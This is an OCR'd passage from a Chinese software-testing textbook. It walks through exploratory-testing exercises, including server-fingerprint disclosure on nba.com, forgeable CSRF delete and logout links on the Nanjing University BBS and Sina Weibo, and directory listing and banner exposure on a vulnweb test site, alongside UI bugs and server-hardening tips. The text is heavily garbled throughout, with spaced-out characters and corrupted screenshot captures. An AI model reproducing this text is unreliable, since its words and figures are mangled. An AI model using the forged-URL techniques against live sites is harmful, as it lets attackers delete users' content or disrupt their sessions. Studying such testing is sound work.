(1) 打开 NBA 网 站 http://www. nba. com/axis/fingerprint. jsp. 
(2) 分 别 在 IE Firefox, Chrome 浏览 器 上 观察 页 面 信息 。 
MAAR 不 显示 Apache AXIS 样本 Servlet 具体 信息 。 
实际 结果 ”显示 Apache AXIS 样本 Servlet 具体 信息 ,如 图 5-7 所 示 。 


"D2 专家 点 评 


参见 5.4 节 实 验 #4 的 专家 点 评 。 
本 例 中 的 URL 能 直接 访问 到 服务 器 指纹 的 详细 信息 ,给 攻击 者 更 多 的 空间 去 研究 如 
何 更 深入 地 攻击 网 站 。 
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€ > Œ D .nba. con pESE 
HOAR 点 击 这 里 导入 书 答 。 开始 








System Fingerprint 


JVM and Server Version 


Servlet Engine Apache Tomcat/5.5.26 2 4 

Java VI Sun Microsystems Inc. Java HotSpot (TN) 64-Bit Server VN 1.5.0 21-b01 
Java RE Sun Wicrosystens Inc. 1.5.0 21 

Platform Linux amd64 2. 6, 18-348. e15 
Boot jars 

rt.jar 40219943 Won Oct 26 10:02:08 EDT 2009 

jsse, jar — 544209 on Oct 26 10:02:09 EDT 2009 

jce.jar — 82642 Mon Aug 24 15:31:14 EDT 2009 


charsets. jar 8898567 Mon Oct 26 10:02:09 EDT 2009 
Only valid on a sun jvm 

System jars 

bootstrap. jar 24095 Hon Jan 28 15:38:25 EST 2008 
Extra system jars 

sunjce provider. jar 158419 Non Aug 24 15:31:14 EDT 2009 
dnsns. jar 8215 Non Aug 24 15:38 


sunpkcs1l. jar 175949 Non Aug 24 15 
localedata. jar T + 26 











图 5-7 显示 Apache AXIS 样本 Servlet 具体 信息 


5.8 ”实验 #8: 南大 小 百合 BBS 存在 CSRF 攻击 漏洞 


缺陷 标题 ”南大 小 百合 BBS 存在 CSRF 攻击 漏洞 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome 或 Firefox. 
测试 步骤 
CD 打开 南大 小 百合 BBS http://bbs. nju. edu. cn, 
(2) 登录 进入 BBS ,尝试 发 儿 个 帖子 ,并 且 观 察 删除 帖子 的 链接 。 
主题 Test BBS 111; http://bbs. nju. edu. cn/vd64377/bbsdel? board = D _ 
Computer&-file— M. 1444972425. A, 
主题 BBS test 2222: http://bbs. nju. edu. cn/vd64377/bbsdel? board = D _ 
Computer8-file— M. 1444972485. A, 
主题 CSRF BBS 333: http://bbs. nju. edu. cn/vd64377/bbsdel? board = D - 
Computer8-file— M. 1444972604. A. 
(3) 尝试 直接 在 浏览 器 中 删除 帖子 链接 。 
期 望 结果 不 会 直接 删除 帖子 。 
实际 结果 ”没有 任何 提示 信息 ,帖子 能 被 删除 ,如 图 5-8 所 示 。 
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ÈD D Computer( 计 算 机 系 ) 
本 版 域名 :Http-7/bbs nju edu. cr/e/D Conputer, ME: Amati pizracake， 版 内 在 线 - 43A. 十 ,订阅 本 版 
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11994 — dong830lq Oct 15 12:40 Re: 计算 机 系 图 书 阅览 室 图 书 整 理 志愿 
11995 W — 15551872701 Oct 15 12:48 Re- 计算 机 系 图 书 阅览 宝 图 书 整理 志愿; 








总 结 (1858 字 节 ) 1010 
24 
16 
结 (115 字 节 ) 21 


11996 € — hfll8li9 Oct 15 16:37 O 兼职 组 稿 招聘 (486 字 节 ) 86 
11990 HW nettis Oct 15 16:59 Re- 计算 机 系 图 书 阅 点 室 图 书 整理 志 原 活动 总 绪 C22 字 节 ] 2 
11998 N.— microflash Oct 15 1:06 O [转载 ] D S38 EHE EIIGRRMEJCTR2O:5. 两 万 元 大 奖 等 你 拿 (1220 字 节 ) 108 
11999 — 19450 Oct 15 21:02 Re: 计算 机 系 图 书 阅览 室 图 书 整理 志愿 活动 总 结 (05855) 21 
120008 yaleyoga Oct 16 08:35 Re: 计算 机 系 图 书 阅览 室 图 书 整 理 志愿 活动 总 结 (30 字 节 ) 6 
12001 1316 Oct 16 08:58 Re; 计算 机 系 图 书 阅览 室 图 书 整 理 志愿 活动 总 结 (72 字 节 ) 6 
120028 — cs2012 Oct 16 09:16 Re: 计算 机 系 图 书 阅览 室 图 书 整 理 志 原 活 动 总 结 (34 字 节 ) T 
12008"  SHST Oct 16 11:01 O [RS] 三 星 电子 Ti ren 技术 开放 日 讲座 《南京 大 学 ) (1157 字 节 ) 12 
12004 kuro Oct 16 11:14 O 关于 计算 机 学 院 葛 者 站 小 正太 (56 字 节 ) 132 
120055 — SMElman — Oct 16 11:160 【实习 ] 北京 里 丰 基 金 招聘 程序 实习 生 (3 5K) 16 
12006 9 — janesliu Oct 16 12:03 Re: XFW FRANEA CFH) nu 
12007 LosehGain Oct 16 12:28 O 摩根 土 彤 利信 息 技术 部 简历 控 收 即将 截止 ， 请 抓紧 投递 C sr) 12 
12008 tsingeoo Oct 16 12:48 Re: 计算 机 系 图 书 阅览 室 图 书 整 理 志愿 活动 总 结 C 字 节 ) 3 
12008 。 royrang Oct 16 13:13 O Test bbs 11111 (12755) 4 
12010 —— royrang Det 16 13:14 O BBS test 2222 (11 字 节 ) 3 
12001 — royrang Oct 16 13:16 O CSRF BBS 333 (10-55) 4 


[添加 边框] 发 表 文章 上 载 区 刷新 上 一 页 主题 模式 3 im 精华 区 下 载 精华 区 版 内 查询 精华 区 查 词 ARR 
RIJE | 篇 














图 5-8 南大 小 百合 BBS 有 CSRF 攻击 漏洞 


DS 专家 点 评 


南大 小 百合 BBS 删除 帖子 的 URL 没有 做 CSRF 保护 ,导致 恶意 用 户 可 以 伪造 删 帖 的 
URL 让 合法 用 户 去 单 击 ,合法 用 户 在 不 知情 的 情况 下 ,删除 了 帖子 。 

分 析 并 执行 这 个 URL, 可 以 发 现 以 下 问题 。 

(D URL 上 缺少 CSRF 安全 Token 保护 ,导致 URL 很 容易 伪造 。 

(2) 删除 时 没有 弹出 警示 确认 信息 ,例如 “您 真 的 要 删除 这 个 帖子 吗 ?”, 使 得 合法 用 户 
在 不 知情 的 情况 下 被 不 法 分 子 利用 , 单 击 链接 ,删除 了 内 容 。 

CSRF 的 思想 可 以 追溯 到 20 世纪 80 年 代 。1988 年 ,Norm Hardy 发 现 这 个 应 用 级 别 
的 信任 问题 ,并 把 它 称 为 混淆 代理 人 (Confused Deputy), 2001 年 ,Peter Watkins 第 一 次 将 
其 命名 为 CSRF ,并 将 其 列 在 Bugtraq 缺陷 列表 中 ,从 此 CSRF 开始 进入 人 们 的 视线 。 从 
2007 年 开始 ,开放 式 Web 应 用 程序 安全 项 目 (Open Web Application Security Project. 
OWASP) 组 织 将 其 排 在 Web 安全 攻击 的 前 十 名 。 

CSRF 就 像 一 个 狐 独 的 猫 人 在 自己 的 狩猎 区 布置 了 一 个 个 陷阱 。 上 网 用 户 就 像 一 个 个 
猎物 ,在 自己 不 知情 的 情况 下 被 其 引诱 ,触发 了 陷阱 ,导致 了 用 户 的 信息 暴露 .财产 丢失 。 因 
为 其 极为 隐藏 ,并且 利用 的 是 互联 网 Web 认证 自身 存在 的 漏洞 ,所 以 很 难 被 发 现 并 且 破 坏 
性 大 。 

现在 大 部 分 Web 应 用 使 用 Cookie/Session 来 标识 用 户 的 身份 并 保持 会 话 状态 ,这 种 设 
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计 在 建立 之 初 就 没有 考虑 可 能 带 来 的 安全 性 问题 。 换 各 话说 ,假设 站 点 使 用 Cookie/ 
Session 的 隐 式 身份 验证 , 当 用 户 完 成 身份 验证 时 ,浏览 器 将 获得 一 个 用 于 识别 用 户 身 份 的 
Cookie/Session, 只 要 用 户 不 关闭 浏览 器 或 退出 Web 应 用 ,用 户 访问 这 个 网 站 的 后 续 操作 都 
不 需要 重新 进行 登录 认证 ,浏览 器 会 为 每 个 请 求 都 “智能 "地带 上 网 站 已 认证 成 功 的 
Cookie/Session 来 识别 自己 。 

当 第 三 方 网 页 生成 对 当前 站 点 域 的 请 求 时 ,该 请 求 也 将 会 获取 当前 站 点 已 认证 的 
Cookie/Session ,便于 后 续 操作 。 这 种 类 型 的 认证 称 为 隐 式 认证 。 

隐 式 认证 带 来 的 问题 就 是 一 旦 用 户 登 录 某 网 站 ,然后 单 击 某 链接 进入 该 网 站 下 的 任意 
一 个 网 页 ,那么 他 在 此 网 站 中 已 经 认证 过 的 身份 就 有 可 能 被 非法 利用 ,在 用 户 不 知情 的 情况 
下 执行 了 一 些 非法 操作 。 而 这 种 Web 身份 认证 自身 存在 的 缺陷 普通 用 户 很 少 知道 ,这 给 
CSRF 攻击 提供 了 便利 。 


5.9 实验 #9: 新 浪 微 博 存 在 CSRF 攻击 漏洞 


缺陷 标题 新 浪 微 博 存 在 CSRF 攻击 漏洞 。 
测试 平台 与 浏览 器 ”Windows 7 十 Chrome 或 Firefox。 
测试 步骤 
(1) 打开 新 浪 微 博 http://weibo. com. 
(2) 登录 进入 新 浪 微 博 , 查 看 退出 的 链接 http://weibo. com/logout. php? backurl = 
%2F。 
(3) 在 浏览 器 中 直接 运行 退出 链接 。 
期 望 结果 不 会 直接 登录 。 
实际 结果 ”没有 任何 提示 信息 .直接 退出 新 浪 微 博 , 如 图 5-9 所 示 。 导 致 新 浪 微 博 能 任 
意 伪造 退出 链接 ,让 任何 一 个 用 户 单 击 后 退出 系统 。 


X [D weibo.com/roywang123/profile?rightmod=1&wvr=6&mod=personinfo 
应 用 C) aboutblank [Bi Suggested Sites V; userqzoneqq<om-.. C) 从 正中 导入 (Ù EUKP4122208 (Ati LH 
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图 5-9 新 浪 微 博 有 CSRF 攻击 漏洞 
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X 专家 点 评 


每 个 登录 新 浪 微 博 的 用 户 , 所 使 用 退出 系统 的 URL. 完全 一 致 ,并 不 做 身份 检查 ,都 是 
http://weibo. com/logout. php? backurl— %2F, |t vA ik4- URL 能 让 任意 用 户 在 不 知情 的 
情况 下 单 击 后 退出 系统 。 

有 的 测试 人 员 或 开发 人 员 对 于 这 样 的 Bug 不 理解 ,认为 这 并 没有 什么 缺陷 。 但 是 这 的 
确 是 让 安全 界 头痛 的 一 个 Web 安全 问题 一 一 CSRF 攻击 ,这 个 问题 稍 一 延伸 大 家 就 不 会 
Kt. 

例如 以 下 情况 。 

(D 因为 自己 不 小 心 扫 了 一 个 二 维 码 ,结果 自己 被 误 拉 入 一 个 群 。 

(2) 因为 自己 误 扫 了 一 个 二 维 码 ,结果 自己 微 信 账户 的 零钱 没有 了 。 

G) 因为 自己 误 点 了 一 个 链接 ,结果 自己 银行 卡 的 钱 被 转 走 了 。 

无 论 是 二 维 码 还 是 链接 ,都 是 去 执行 一 个 操作 ,如 果 关 键 的 操作 不 进行 CSRF 防护 , 那 
么 这 些 URL 很 容易 被 伪造 ,给 用 户 在 不 知情 的 情况 下 带 来 重大 损失 。 

这 需要 各 大 应 用 提供 商 提高 自己 应 用 的 安全 等 级 ,防护 住 各 种 安全 漏洞 ,以 免 让 用 户 处 于 
威胁 与 不 安之 中 。 目 前 对 CSRF 防护 比较 优秀 的 解决 方案 就 是 URL 中 带 有 CSRFToken £ 
数 。 这 个 参数 的 值 是 攻击 者 无 法 预知 的 ,服务 器 校 验 时 ,只 要 URL 不 带 CSRFToken 或 者 
CSRFToken 带 得 不 对 ,就 不 执行 用 户 的 请 求 ,这 样 就 能 彻底 杜绝 CSRF 攻击 。 


5.10 实验 # 10: testphp 网 站 目录 列表 暴露 


缺陷 标题 testphp 网 站 存在 目录 列表 信息 暴露 问题 。 
测试 平台 与 浏览 器 Windows 7(64 bit) 十 IE 11 或 Firefox。 
测试 步骤 
(1) 打开 testphp 网 站 http: //testphp. vulnweb. com/Flash/ 。 
(2) 分 别 在 IE, Firefox 浏览 器 上 观察 页 面 信息 。 
期 望 结果 不 显示 目录 列表 信息 。 
实际 结果 ”显示 目录 列表 信息 ,如 图 5-10 所 示 。 


= 
Bo [E httpi//testphp.vuinweb.com/Flash/ 


| Index of /Flash/ 















[til index of /Flash/ 





























11-May-2011 10:27 
11-May-2011 10:27 


154624 
17418 











图 5-10 显示 目录 列表 信息 





[va 专家 点 评 


如 果 目 录 结 构 能 被 轻松 遍历 ,那么 网 站 的 源码 、 数 据 库 设计 、 日 志 等 都 能 被 下 载 研究 ,这 
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对 一 个 网 站 或 应 用 来 说 是 灾难 性 的 。 


5.11 实验 #11: 智慧 绍兴 -电子 刻字 选择 颜色 下 拉 列 表 出 
现 英文 


缺陷 标题 智慧 绍兴 一 到 此 一 游 习 电子 刻字 页 面 单 击 “ 电 子 刻字 ”, 选 择 颜 色 下 拉 列 表 
为 red, yellow blue, white,black. 
测试 平台 与 浏览 器 Windows 10+- Chrome 或 Firefox, 
测试 步骤 
(1) 打开 智慧 绍兴 网 站 http://www. roqisoft. com/zhsx. 
(2) 单 击 导航 条 中 的 “到 此 一 游 ”。 
(3) 单 击 “ 电 子 刻 字 ”>“ 体 验 电子 刻字 ”。 
期 望 结果 ”选择 颜色 下 拉 列 表 中 应 该 为 中 文 红色 、 黄 色 、 蓝 色白 色 、 黑 色 。 
实际 结果 ”选择 颜色 下 拉 列 表 为 red、yellow、blue、white、black, 如 图 5-11 所 示 。 


cor 


€ > C O wwwrogisoftcom/zhsx/blog/htmlSkezi/kezi.php?rnd - 1669486085 


智慧 绍兴 -电子 刻字 
修改 第 一 行 待 刻 文字 : 郑 页 丫 到 此 一 洲 
修改 第 二 行 待 刻 文字 2017 年 11 月 9 日 MS 
选择 字体 : x c 选择 字号 : 40， 
选择 图 片 : | 选择 文件 | 未 选择 任何 文件 











5-11 颜色 下 拉 列 表 为 英文 


x 专家 点 评 


对 于 中 文 网 站 ,所 有 的 文字 应 该 显示 为 中 文 。 但 是 ,开发 者 经 常 主 界面 上 都 是 中 文 , 当 
出 现 提示 、 下 拉 列 表 等 项 的 时 候 ,忘记 将 选项 改 成 中 文 。 
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类 似 地 ,对 于 国际 网 站 测试 ,许多 网 站 支持 多 种 语言 切换 , 主 界面 一 般 看 上 去 都 能 切换 
到 相应 的 语言 ,但 是 当 出 错 、 输 入 无 效 、 和 输入 不 满足 要 求 时 ,就 可 能 出 现 英文 提示 ,测试 工程 
师 需 要 注意 验证 。 


5.12 实验 #12 : oricity 网 站 错误 提示 使 用 英文 


缺陷 标题 oricity 网 站 一 已 经 结束 的 活动 页 面 , 单 击 任意 链接 出 现 *“Access Reject, 请 
登录 后 浏览 .….”。 
测试 平台 与 浏览 器 ”Windows 7 十 IE 11 或 Firefox 或 Chrome。 
测试 步骤 
(1) 打开 oricity 网 站 http://www. oricity. com/. 
(2) 在 “已 经 结束 的 活动 ”栏目 中 , 单 击 任意 活动 去 查看 活动 详情 信息 ,例如 , 单 击 
“OC No. 330 羽球 活动 ( 迈 歌 发 起 ) 活动。 
期 望 结果 ”提示 登录 后 才能 查看 ,或 者 跳 转 到 登录 页 面 (活动 需要 登录 才能 查看 ) 。 
实际 结果 ”提示 “Access Reject, 请 登录 后 浏览 ...”, 如 图 5-12 所 示 。 


D www.oricity.com/event/, x 


€ > © [)www.oricity.com/event/eventinfo.php?eventid-89012850 w Q Fí = 
Access Reject， 请 登录 后 浏览 .. . 














图 5-12 出现 Access Reject 英文 提示 错误 


EO 专家 点 评 


导致 Access Reject 错误 的 原因 有 多 种 ,可 能 是 程序 设计 中 权限 分 配 有 问题 ,或 者 认证 
服务 器 失败 等 。“ 已 经 结束 的 活动 ”板块 设置 的 权限 是 登录 后 才能 查看 ,在 未 登录 的 状态 下 
访问 此 板块 的 活动 信息 ,那么 应 该 跳 转 到 登录 页 ,而 不 是 直接 出 现 Access Reject, 

另外 ,这 是 一 个 中 文 的 站 点 ,即使 是 出 错 页 ,也 应 该 出 现 中 文 的 错误 提示 ,用 英文 的 提示 
也 不 合适 。 


5.13 ”实验 #13: openclass 软件 开发 在 线 公 开课 问题 


缺陷 标题 “ 言 若 金 叶 在 线 免费 公开 课 “ 软 件 开 发 方向 ”页 面 无 法 显示 。 
测试 平台 与 浏览 器 ”Windows XP 十 IE 8 或 Firefox, 
测试 步骤 

COD 打开 言 若 金 叶 在 线 免费 公开 课 网 站 http: / /openclass. roqisoft. com. 
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(2) 单 击 “ 软 件 测试 方向 ”, 观 察 页 面 。 
(3) 单 击 “ 软 件 开发 方向 ”, 观 察 页 面 。 
期 望 结果 ” 既 能 看 到 软件 测试 方向 也 能 看 到 软件 开发 方向 的 公开 课 。 
实际 结果 ”只 能 看 到 软件 测试 方向 的 在 线 免费 公开 课 页 面 , 单 击 “ 软 件 开 发 方向 ”后 页 


面 无 反应 ,如 图 5-13 所 示 。 
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图 5-13 单 击 “软件 开发 方向 ”后 页 面 无 反应 
DS 专家 点 评 


“软件 开发 方向 ”的 链接 是 一 个 典型 的 空 链接 ,不 会 跳 转 到 任何 页 面 。 


出 现 空 链接 的 原因 如 下 。 
网 页 开发 是 一 个 一 个 页 面 编写 代码 的 ,当时 在 做 链接 时 ,这 个 页 面 可 能 没 做 出 来 ,所 以 


当时 就 留 下 一 个 空 链 接 在 这 里 ,最 后 忘记 改 成 真实 的 链接 了 。 
也 有 可 能 当时 接口 的 URL 没 定 义 好 , 先 放 一 个 空 链接 在 这 里 。 


5.14 实验 #14: books《 生 命 的 足迹 经 典 版 ) 样 张 下 载 问题 


缺陷 标题 ” 言 若 金 叶 软 件 研究 中 心 -资源 下 载 一 找到 书籍 (生命 的 足迹 》 页 面 ,书籍 电子 
















版 下 载 无 法 打开 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome, 
测试 步骤 
(1) 打开 言 车 金 叶 软件 研究 中 心 -资源 下 载 网 站 http://books. roqisoft. com/ 
download, 


(2) 单 击 “中 英 双语 励志 书籍 ?导航 链接 ,出 现 的 页 面 如 图 5-14 所 示 。 
G) 单 击 “ 书 籍 样张 电子 版 下 载 阅 读 " 链 接 。 
期 望 结果 ”能够 正常 打开 电子 版 下 载 阅读 。 


实验 5 ”软件 探索 测试 训练 





软件 测试 书籍 ”软件 开发 书籍 。” 软件 项 目 管理 书籍 。 Web 安全 书籍 。 中 英 双 语 励志 书籍 ”总 序 ”出 版 原因 KERN 


x MEE 


OEIL ERE SS OREURUCE CEAN RES A The Footprints of Life Classic Edition) SPE SER FG 





9787302356769 生命 的 足迹 经 典 版 EM. ERT. AME. PIRE 25 2014-8-11 
ae oft. com/footprints 





arra TTA. Sanlo "Ciper download 
Aitik: Free online reading 






ATi EITA E. ERENG. HA 
birik e umet a ti 





The Footprints of Life Classic Edit 
给 自己 以 无 限 的 力量 ， 努 力 把 所 








本 所 可 从 g. YR. kuna. WEMA, MERA, A ERIGI TIAE OX 











图 5-14 中 英 双 语 励志 书籍 
实际 结果 “无 法 正常 打开 网 页 ,出 现 404 错误 ,如 图 5-15 所 示 。 







C | O www.tupitsinghua.edu.cn/Resource 


服务 器 错误 


/15y2/059332-01 pdf 








出 现 404 错 误 








图 5-15 出 现 404 错误 


DO 专家 点 评 


书生 样张 链接 接口 指向 清华 大 学 出 版 社 ， 出 现 找 不 到 样张 的 原因 ,可 能 是 原 先 这 个 样张 
链接 是 可 以 下 载 的 ,也 是 清华 大 学 出 版 社 提 供 的 ,但 是 后 来 清华 大 学 出 版 社 网 站 改版 ,系统 
中 的 链接 或 内 部 编号 升级 ,导致 找 不 到 对 应 的 样张 。 

这 要 求 网 站 如 果 有 第 三 方 的 图 片 、 网 页 、 文 档 等 链接 ,必须 及 时 更 新 ,为 避免 第 三 方 网 站 
引用 的 图 片 、 文 档 等 被 删除 、 转 移 目 录 等 ,可 以 把 这 些 图 片 、 文 档 放 到 自己 的 网 站 目录 下 引 
用 ,减少 对 第 三 方 网 站 的 依赖 。 


5.15 By X15; InfoSec 网 络 空间 安全 公告 问题 


缺陷 标题 ”网 络 空间 安全 -信息 安全 技术 网 公告 :出现 404 错误 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome 54.0。 
测试 步骤 

CD 打开 网 络 空间 安全 -信息 安全 技术 网 http://www. rogisoft. com/infosec/。 
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(2) 单 击 “公告 ", 如 图 5-16 所 示 。 








m db: araen. avena. eauenama. UU Rennes. MU. REMANH. HM- e| 


— D 























OMM xc: ROW. ane GbR. AME UN 
42007 «12» 

We : AGER PIOBHTTPSIBGAESIRE . LUNDI AHTTPSIIT BENY. BRHF E s ü x w ü 

HTTPS. ERREEN ， GUTCLEVCR FCURESMMTTPSISINN . IRRE "EI 这 Pe 


WL.ORRORGETWHTTP , HTTPS , RIRN- LAQHA , RE RECIRAREI — helos ESQ RU ERE. 


n un nw sijo 
WORN NEERA , 4 RUNS LOIN . XR ARABIAID , IDA S a TSS nta 
ST, AGAS OARE zm 0: rom omo» on 


mene. 





图 5-16 “公告 ”页面 


期 望 结 果 ”能够 查看 公告 详情 。 
实际 结果 ”出现 404 错误 ,参见 图 3-2, 


x 专家 点 评 


参见 3. 1 节 实 验 #1 的 专家 点 评 。 
探索 测试 也 经 常会 找到 一 些 功能 或 界面 上 的 问题 。 


5.16 实验 #16: InfoSec 网 络 空间 安全 图 片 问 题 


缺陷 标题 ”网络 空间 安全 -信息 安全 技术 网 图 片 无 法 正常 显示 。 
测试 平台 与 浏览 器 Windows 7 十 Chrome 54.0, 
测试 步骤 


(1) 打开 网 络 空 间 安全 -信息 安全 技术 网 http://www. roqisoft. com/infosec/。 
(2) 单 击 “ 也 许 这 样 理解 HTTPS 更 容易 ”链接 ,在 新 的 页 面 检查 网 页 元 素 。 


URL Jj http://www. rogisoft. com/infosec/? post—21, 
期 望 结果 网 页 上 所 有 元 素 显 示 正 常 。 
实际 结果 ”图片 无 法 显示 ,如 图 5-17 所 示 。 


x5 专家 点 评 


参见 2. 13 节 实 验 #13 的 专家 点 评 。 





网 


页 
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也 许 这 样 理解 HTTPS 更 容易 


foo Ria Aet Oca] Doo ZEE ABT TAERE 





程 .在 阅读 本 文 时 (RETE SEGCHCFCUSSRIHTTPSINIBNE ,这 样 更 利于 -还 原 过 程 . 


我 们 先 不 了 聊 HTTP，HTTPS ,我 们 先 从 一 个 聊天 软件 说 起 ， 我 们 要 实现 A 能 发 一 个 hello 消 息 给 B : 





如 果 我 们 要 实现 这 个 聊天 软件 ， 本 文 只 考虑 安全 性 问题 ， 要 实现 
A 发 给 8 的 hello 消 息 包 ,即使 被 中 间 人 拦截 到 了 ， 也 无 法 得 知 消息 的 内 容 | 


如 何 做 到 真正 的 安全 ? 


AONBAMEEURO s BUCH 
SAPERE. SATENE 
IIS “s BEAD 
*ugaaayaq s sena 

S Ertiiiworksn... Ei workcard 














图 5-17 图 片 无 法 显示 


5.17 实验 #17: testphp 网 站 出 现 错误 暴露 服务 器 信息 


缺陷 标题 testphp 网 站 出 现 禁 止 错 误 ,并 显示 服务 器 信息 。 
测试 平台 与 浏览 器 Windows 10 十 IE 11 或 Chrome 45. 0。 
测试 步骤 
(1) 打开 testphp 网 站 http: //testphp. vulnweb. com/. 
(2) 在 地 址 栏 中 追加 cgi-bin. f Enter 键 ,如 图 5-18 所 示 。 











€ > CŒ D testphpvulnweb.com/cgi-bin | M 


Nacunetix 追加 cgi-bIN 


home | categories | artists | disclaimer | your cart | guestbook | AJAX Demo 





Search art welcome to our page 




















Test site for Acunetix WVS. 
Browse categories 


Browse artists. 

Your cart 

Signup 

Your profile. 

Our guestbook 
JAX Demo 


inks 


rity art 
Fractal Explorer 


About Us | Privacy Policy | Contact Us | Shop | HTTP Parameter Pollution 








5-18 在 地 址 栏 中 追加 cgi-bin 
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期 望 结 果 页面 不 存在 ,出 现 一 个 友好 的 界面 。 
实际 结果 “出现 Forbidden( 禁 止 ) 错 误 , 并 显示 服务 器 信息 ,结果 如 图 5-19 所 示 。 








€ > QC D testphpyulnweb.com/cgi-bin 


Forbidden 





You don't have permission to access / on this server. 





Apache Server at localhost Port 8000 











B 5-19 出 现 Forbidden( 禁 止 ) 错 误 并 显示 服务 器 信息 


D$ 专家 点 评 


如 果 是 禁止 访问 ,应 该 出 现 一 个 友好 的 页 面 , 而 且 不 能 出 现 具体 的 服务 器 信息 。 

每 当 Apache2 网 站 服务 器 返回 错误 页 时 (如 404 页 面 无 法 找到 ,403 禁止 访问 页 面 ), 它 
会 在 页 面 底部 显示 网 站 服务 器 签名 (如 Apache 版 本 号 和 操作 系统 信息 ) 。 同 时 , 当 Apache? 
网 站 服务 器 为 PHP 页面 服务 时 , 它 也 会 显示 PHP 的 版 本 信息 。 

1. 关闭 Apache 服务 器 banner 

Æ / home/apache/conf/httpd. conf 文件 中 添加 如 下 两 行 即 可 。 

ServerSignature Off 

ServerTokens Prod 

2. 关闭 tomcat 版 本 的 服务 器 

(1) 找到 tomcat6 主 目录 中 的 lib 目录 ,找到 tomcat-coyote. jar, 

(2) 修改 tomcat-coyote. jar \ org \ apache \ coyote \ ajp \ Constants. class 和 tomcat- 
coyote. jar\org\apache\coyote\httpl1\Constants. class. 

ajp\Constants. class 中 : 


SERVER BYTES = ByteChunk.convertToBytes("Server: Apache - Coyote/1.1\r\n"); 
httpl IVConstants, class 中 : 


public static final byte[] SERVER BYTES = ByteChunk.convertToBytes("Server: Apache - Coyote/ 
1.1XW"); 


将 server: Apache-Coyote/1. 1 修改 为 unknown PP T. 
(3) 修改 完毕 将 新 的 class 类 重新 打包 至 tomcat-coyote. jar 中 。 
(4) 上 传 至 服务 器 ,重启 tomcat 服务 即 可 。 


5.18 实验 #18: 智慧 绍兴 -积分 管理 页 随机 数 问题 


缺陷 标题 智慧 绍兴 一 我 的 空间 一 积分 管理 , 单 击 * 赞 "图标 后 观察 URL, 随 机 数 有 
问题 。 


实验 5 ”软件 探索 测试 训练 


测试 平台 与 浏览 器 Windows 10 十 Chrome 或 Firefox, 
测试 步骤 
COD 打开 智慧 绍兴 网 站 http://www. roqisoft. com/zhsx, 用 zxr/test123 登录 。 
(2) 单 击 导 航 条 中 的 “我 的 空间 ”>“ 积 分 管理 ”。 
(3) 单 击 “ 赞 ”图标 ,观察 浏览 器 地 址 栏 的 URL 变化 ,特别 是 随机 数 。 
期 望 结果 ”随机 数 每 次 会 变 ,并 且 每 次 都 不 一 样 。 
实际 结果 ”随机 数 不 断 地 拼 在 URL 中 ,最 终 导 致 URL 过 长 而 不 能 正常 解析 ,如 图 5-20 
所 示 。 
国 2 : > 


oremgr php?nd= 5685311827rnd= 1087411872 





©- maa 
wur. 58 les) (pm 


wiw roqsoft com, am en» 












KU Awmi Q Emaan 





bsec 


智能 导航 景点 互动 到 此 一 游 景区 特产 我 的 空间 美景 欣赏 





积分 管理 


获得 积分 的 途径 的 两 种 
1 每 天 登录 ， 进 入 个 人 游记 ， 点 击 金币 获取 积分 ( 每 天 仅 可 积 一 分 ) 。 
2. 参 加 优秀 作品 摄影 大 赛 ， 获 奖 选手 ， 系 统 会 加 分 。 第 一 名 加 100 积 分 ， 第 二 名 加 70 积 分 ， 第 三 名 加 50 积 分 。 






RABARBA , AARMAU Y 











admin 
roywang FUIBIBIEWS , ATEMIS ! 
eagiochen 只 有 超级 管 理 品 ， 才 和 权限 加 会 与 碱 人 1 

[] 只 月 人 管理 员 , 286902539 ! 

m |. Fnumttun , 2 EERUD RO | 

Y RISENQEM , HhERUDS MO ! 

E " 
u 

yw 

m 














5-20 ”随机 数 不 断 地 拼 在 URL 中 


DS 专 家 点 评 


URL 后 面 添 加 随机 数 通常 用 于 防止 客户 端 (浏览 器 ) 缓 存 页 面 。 也 就 是 保证 每 次 显 
示 这 个 网 页 ,会 从 服务 器 端 获取 最 新 的 数据 来 展示 ,而 不 是 直接 显示 已 经 缓存 过 的 旧 
页 面 。 

浏览 器 缓存 是 基于 URL 进行 的 ,如 果 页 面 允 许 缓存 , 则 在 一 定时 间 内 (缓存 时 效 时 间 
前 ) 再 次 访问 相同 的 URL ,浏览 器 不 会 再 次 发 送 请 求 到 服务 器 端 ,而 是 直接 从 缓存 中 获取 指 
定 资源 。URL 后 面 添 加 随机 数 后 ,URL 就 不 同 了 ,可 以 看 作 唯一 的 URL( 随 机 数 恰 好 相同 
的 概率 非常 低 ,可 以 忽略 不 计 ), 这 样 浏览 器 的 缓存 就 不 会 匹配 出 URL, 每 次 都 会 从 服务 器 
获取 最 新 的 文件 。 
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初学 网 页 开发 的 人 员 经 常会 犯 不 带 随机 数 的 错误 ,导致 明明 自己 保存 的 数据 已 经 写 到 
数据 库 中 , 却 不 能 显示 出 来 。 但 是 ,对 于 URL 随机 数 的 拼装 也 是 有 讲究 的 , 那 就 是 如 果 原 
先 的 URL 中 没有 类 似 random 的 随机 数 参 数 , 那 就 要 带 上 ; 如 果 已 经 有 了 ,就 要 替换 
random 参数 中 的 值 ,而 不 是 继续 往 后 拼装 random 参数 。 

本 例 XXX/scoremgr. php? rnd—568531182? rnd— 1087411872 ZT AKENTA 
A rnd 参数 ,如 果 玩 3 次 就 会 出 现 3 个 rnd 参数 , 依 此 类 推 。 但 是 ,浏览 器 URL 能 接收 的 字 
符 数 是 有 限 的 ,如 果 不 停 地 单 击 , 就 会 导致 页 面 不 再 刷新 展示 。 这 是 一 个 隐藏 比较 深 的 缺 
陷 , 一 般 具 有 网 页 开发 相关 技术 背景 的 人 才能 发 现 这 样 的 潜在 问题 。 


5.19 实验 #19: 智慧 绍兴 -我 的 好 友 列 表 翻 页 问题 


缺陷 标题 智慧 绍兴 一 我 的 好 友 ,好友 太 多 ,不 支持 翻 页 。 

测试 平台 与 浏览 器 ”Windows 10 十 Chrome 或 Firefox。 

测试 步骤 
CD 打开 智慧 绍兴 网 站 http://www. roqisoft. com/zhsx, 用 zxr/test123 登录 。 
(2) 单 击 导航 条 中 的 “我 的 空间 ”一 “我 的 好 友 ”。 
(3) 加 一 些 人 为 好 友 ,观察 页 面 情况 。 

期 望 结果 页 面 能 正常 显示 ,如 果 好 友 太 多 ,可 以 翻 页 显示 。 

实际 结果 ”页面 好 友 太 多 .没有 翻 页 功能 ,如 图 5-21 所 示 。 


智能 导航 景点 互动 到 此 一 游 景区 特产 我 的 空间 美景 欣赏 





